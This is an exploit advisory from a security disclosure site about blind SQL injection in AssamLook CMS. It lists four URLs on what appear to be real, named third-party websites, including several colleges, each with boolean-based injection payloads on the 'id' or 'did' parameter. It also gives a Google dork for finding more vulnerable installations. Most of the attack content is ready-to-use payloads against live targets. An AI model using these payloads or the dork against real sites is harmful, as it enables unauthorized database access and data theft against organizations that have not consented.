AssamLook CMS - Blind SQL Injection Vulnerabilities

2025.05.01
us Mr_Amir_Typer (US) us
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:"Powered By Assamlook.com"

********************************************************* # Exploit Title: AssamLook CMS - Blind SQL Injection Vulnerabilities # Date: 2025-04-30 # Exploit Author: AmirHossein Abdollahi | Mr_Amir_Typer # Google Dork: intext:"Powered By Assamlook.com" # Category: WebApps # Tested On: Windows, Firefox ********************************************************* [+] Vulnerable Parameter: `id` or `did` in URLs with `.php?id=` or `.php?did=` ********************************************************* ### Demo 1: https://rhinoprintopacks.com/product.php?id=53' and 1=1--+ https://rhinoprintopacks.com/product.php?id=53' and 1=2--+ ### Demo 2: https://www.nonoicollege.in/department-profile.php?did=1' and 1=1--+ https://www.nonoicollege.in/department-profile.php?did=1' and 1=2--+ ### Demo 3: https://rahacollege.co.in/department-profile.php?did=3' and 1=1--+ https://rahacollege.co.in/department-profile.php?did=3' and 1=2--+ ### Demo 4: https://www.lumdingcollege.org/view_tender.php?id=108' and 1=1--+ https://www.lumdingcollege.org/view_tender.php?id=108' and 1=2--+ ********************************************************* [+] Google Dork: intext:"Powered By Assamlook.com" ********************************************************* # Discovered by: AmirHossein Abdollahi | Mr_Amir_Typer


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2025, cxsecurity.com

 

Back to Top